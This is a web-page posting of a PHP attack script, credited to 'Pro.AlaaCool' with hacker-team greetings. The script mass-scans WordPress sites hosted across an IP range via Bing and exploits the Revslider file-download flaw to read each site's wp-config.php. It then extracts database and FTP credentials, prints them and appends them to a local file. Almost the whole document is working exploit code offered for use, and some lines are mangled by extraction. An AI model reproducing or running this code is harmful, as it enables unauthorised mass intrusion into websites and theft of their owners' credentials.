facebook facebook twitter rss

php Script Sacn Revslider And Exploit Op_Server

Author: Pro.AlaaCool , Published: 26-03-2015

 <?php 

//Coded By Pro.AlaaCool 
set_time_limit(0);
error_reporting(0);
echo 
"================ php Script Scan Revslider And Exploit Op_Server V1 BY Pro.AlaaCool  ================\n\n";
echo 
"Coded By : Pro.AlaaCool/Egypt HackErs \n\n";
echo 
"Team : Mookben Arab\n\n";
echo 
"Twitter : @SPro.AlaaCoool\n\n";
echo 
"Skype : Pro.AlaaCool\n\n";
echo 
"Hotmail  : Pro.AlaaCoool@Hotmail.com\n\n";
echo 
"Yahoo : Pro.AlaaCooo@Yahoo.Com\n\n";
echo 
"Special thanks to: Team HAckerS MooKBEN Arab\n\n";
echo 
"YouTube  : https://www.youtube.com/user/TheAlaaCool\n\n";
echo 
"[+] Pro.AlaaCool[+] Eagle IRaq [+] Mr.Maax [+] MR M!DWEST[+]S4wDz";
echo 
"[+] Abu Saeed  [+] MokhaLad Hackres  [+] CrAzY HaCkEr [+]Dr.silnt hill";
echo 
"[+]Lost Hackers [+] Bad Man Hackers[+]RxR Hacker[+]Dr.Web[+] Kaad ip";
echo 
"[+]Abu Omr     [+] Mesho Hexor [+]Golden-Hacker [+]V!RuS_BaGhDaD";
echo 
"[+] Mr.QlQ[+]OsaMaa KapoO [+] All Team 755 And Team Hack Book";


echo 
"================ php Script Sacn Revslider And Expliot Op_Server v1 Coded By Pro.AlaaCool ! ================\n\n";
echo 
"Server Target IP BY Pro.AlaaCool : ";
$ip=trim(fgets(STDIN,1024));
$ip explode('.',$ip);
$ip $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
for(
$i=0;$i <= 255;$i++)
{
$sites array_map("site"bing("ip:$ip.$i wordpress"));
$un=array_unique($sites);
echo 
"[+] Scanning By Pro.AlaaCool -> "$ip.$i""."\n";
echo 
"Found By Pro.AlaaCool : ".count($sites)." sites\n\n";
foreach(
$un as $pok){
$host=findit($file,"DB_HOST', '","');");
$db=findit($file,"DB_NAME', '","');");
$us=findit($file,"DB_USER', '","');");
$pw=findit($file,"DB_PASSWORD', '","');");
$bda="http://$pok";
    
$linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
    
$dn=($bda).($linkof);
    
$file=@file_get_contents($dn);
    if(
eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
    echo 
"[+] Scanning => ".$bda."\n\n";
    echo 
"[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
    echo 
"[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
    echo 
"[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
    echo 
"[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
    
$db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
    
$user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
    
$pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
    
$host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
    
$ux "".$bda."\r\n";
    
$ux1 "".$db."\r\n";
    
$ux2 "".$user."\r\n";
    
$ux3 "".$pass."\r\n";
    
$ux4 "".$host."\r\n";
    
$save=fopen('ProAlaaCool.txt','ab');
    
fwrite($save,"$ux");
    
fwrite($save,"$ux1");
    
fwrite($save,"$ux2");
    
fwrite($save,"$ux3");
    
fwrite($save,"$ux4");
    }
    elseif(
eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
    echo 
"FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
    echo 
"FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
    echo 
"FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
    }
    else{echo 
$bda." : Not Revslider \n\n";}
}
}
function 
findit($mytext,$starttag,$endtag) {
 
$posLeft  stripos($mytext,$starttag)+strlen($starttag);
 
$posRight stripos($mytext,$endtag,$posLeft+1);
 return  
substr($mytext,$posLeft,$posRight-$posLeft);
}
function 
site($link){
return 
str_replace("","",parse_url($linkPHP_URL_HOST));
}
function 
bing($what){
for(
$i 1$i <= 2000$i += 10){
$ch curl_init();
curl_setopt ($chCURLOPT_URL"http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($chCURLOPT_USERAGENT"msnbot/1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($chCURLOPT_SSL_VERIFYPEER0);
curl_setopt ($chCURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
curl_setopt ($chCURLOPT_COOKIEJARgetcwd().'/cookie.txt');
curl_setopt ($chCURLOPT_RETURNTRANSFER1);
curl_setopt ($chCURLOPT_FOLLOWLOCATION1);
$data curl_exec($ch);
preg_match_all('#;a=(.*?)" h="#',$data$links);
foreach(
$links[1] as $link){
$allLinks[] = $link;
}
if(!
preg_match('#"sw_next"#',$data)) break;
}

if(!empty(
$allLinks) && is_array($allLinks)){
return 
array_unique(array_map("urldecode"$allLinks));
}
}
?>

Like us on Facebook :